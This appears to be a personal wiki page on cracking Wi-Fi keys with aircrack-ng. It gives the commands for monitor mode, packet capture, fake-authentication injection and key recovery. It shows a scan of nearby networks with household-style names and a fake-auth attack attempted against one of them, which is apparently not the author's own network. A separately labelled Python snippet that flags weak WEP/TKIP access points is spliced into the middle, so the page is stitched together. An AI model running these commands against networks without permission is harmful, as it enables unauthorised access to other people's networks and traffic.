!!! Wifi Cracking

For all information see [Aircrack-ng.org|http://www.aircrack-ng.org/]
\\and the [Linux newbie Guide|http://www.aircrack-ng.org/doku.php?id=newbie_guide]

Put the wifi card into ''monitor mode'': {{{airmon-ng start eth1}}}

See what is passing by using __airodump__:

{{{
root@bismarck:~# airodump-ng eth1
CH  7 ][ Elapsed: 1 min ][ 2007-09-17 18:40 
                                                                                                             
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                             
 00:0C:F6:2B:70:C6   -1        3        0    0  11  54. WPA  TKIP   PSK  Sitecom                             
 00:14:7F:B0:5A:E1   -1       11        0    0   1  48  WPA2 CCMP   PSK  SpeedTouchD4CAEA                    
 00:16:0A:0D:EF:EB   -1       18        0    0   6  54  WEP  WEP         DirtyHarryWifi                      
 00:02:6F:09:0A:05   -1       21        0    0   6  11  WEP  WEP         conexant                            
 00:01:E3:55:2F:86   -1       46        0    0   1  54. WPA2 CCMP   PSK  Meyer                               
 00:1A:70:47:A7:57   -1      108        0    0  11  48  WPA2 CCMP   PSK  Fam. Kok                            
 00:18:4D:54:9F:38   -1      190        0    0  11  48  WPA  TKIP   PSK  @Home51402                          
 00:14:7F:B0:67:50   -1       41        3    0   6  48  WPA2 CCMP   PSK  SpeedTouch2E36F8                    
 00:90:96:CF:80:77   -1        3        0    0   9  48  WPA  TKIP   PSK  SpeedTouch8E5F35                    
                                                                                                             
 BSSID              STATION            PWR  Lost  Packets  Probes                                            
                                                                                                             
 00:14:7F:B0:67:50  00:18:F8:B0:1B:34   -1     0        1                                                    
}}}
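
As an added example (not part of the original page): a small Python parser for the airodump-ng table above, for checking a survey of access points you administer for WEP or TKIP. The cipher/auth token lists and the finding labels are assumptions of this example; the sample rows are copied from the listing above.

```python
import re

# Constructed sample: rows taken from the airodump-ng listing on this page.
SAMPLE = """\
 BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

 00:0C:F6:2B:70:C6   -1        3        0    0  11  54. WPA  TKIP   PSK  Sitecom
 00:16:0A:0D:EF:EB   -1       18        0    0   6  54  WEP  WEP         DirtyHarryWifi
 00:02:6F:09:0A:05   -1       21        0    0   6  11  WEP  WEP         conexant
 00:1A:70:47:A7:57   -1      108        0    0  11  48  WPA2 CCMP   PSK  Fam. Kok

 BSSID              STATION            PWR  Lost  Packets  Probes

 00:14:7F:B0:67:50  00:18:F8:B0:1B:34   -1     0        1
"""

MAC = r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}"
# AUTH is blank on WEP rows and the ESSID may contain spaces, so CIPHER and
# AUTH are optional tokens and the ESSID is whatever remains on the line.
ROW = re.compile(
    rf"^\s*(?P<bssid>{MAC})\s+(?P<pwr>-?\d+)\s+(?P<beacons>\d+)\s+(?P<data>\d+)"
    r"\s+(?P<rate>\d+)\s+(?P<ch>\d+)\s+(?P<mb>\S+)\s+(?P<enc>\S+)"
    r"(?:\s+(?P<cipher>WEP\d*|TKIP|CCMP))?(?:\s+(?P<auth>PSK|MGT|SKA|OPN))?"
    r"(?:\s+(?P<essid>.*\S))?\s*$"
)

def parse_aps(text):
    """Return one dict per access-point row; station rows do not match ROW."""
    return [m.groupdict() for m in map(ROW.match, text.splitlines()) if m]

def finding(ap):
    """Classify one AP by its ENC/CIPHER columns (labels are this example's own)."""
    if ap["enc"] == "OPN":
        return "open network: no encryption"
    if ap["enc"] == "WEP":
        return "WEP: migrate to WPA2"
    if ap["cipher"] == "TKIP":
        return "TKIP: legacy cipher, prefer CCMP"
    return "ok"

def audit(text):
    """List (essid, bssid, finding) for every AP that is not 'ok'."""
    return [(ap["essid"], ap["bssid"], finding(ap))
            for ap in parse_aps(text) if finding(ap) != "ok"]

if __name__ == "__main__":
    for essid, bssid, note in audit(SAMPLE):
        print(f"{bssid}  {essid:<20} {note}")
```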

!! Passive attack

Here you collect a very large number of beacons from an AP, save them to a file, and then use that file
to recover the key.
{{{airodump-ng -c 9 --bssid 00:14:7F:B0:67:50 -w output eth1}}}

!! Active attack

Your card must support packet injection!
{{{aireplay-ng -1 0 -e DirtyHarryWifi -a 00:16:0A:0D:EF:EB -h 00:19:D2:83:F3:77 eth1 }}}

However, on my Centrino chipset packet injection is not supported:
{{{
root@bismarck:~# aireplay-ng -1 0 -e @Home51402 -a 00:18:4D:54:9F:38 -h 00:19:D2:83:F3:77 eth1
19:03:31  Sending Authentication Request
19:03:33  Sending Authentication Request
19:03:35  Sending Authentication Request
19:03:37  Sending Authentication Request
19:03:39  Sending Authentication Request
19:03:41  Sending Authentication Request
19:03:43  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).
}}}

!! The real cracking

Once you have enough packets (IVs, Initialization Vectors), meaning thousands, you can start "calculating":
{{{aircrack-ng -b 00:01:02:03:04:05 dump-01.cap}}}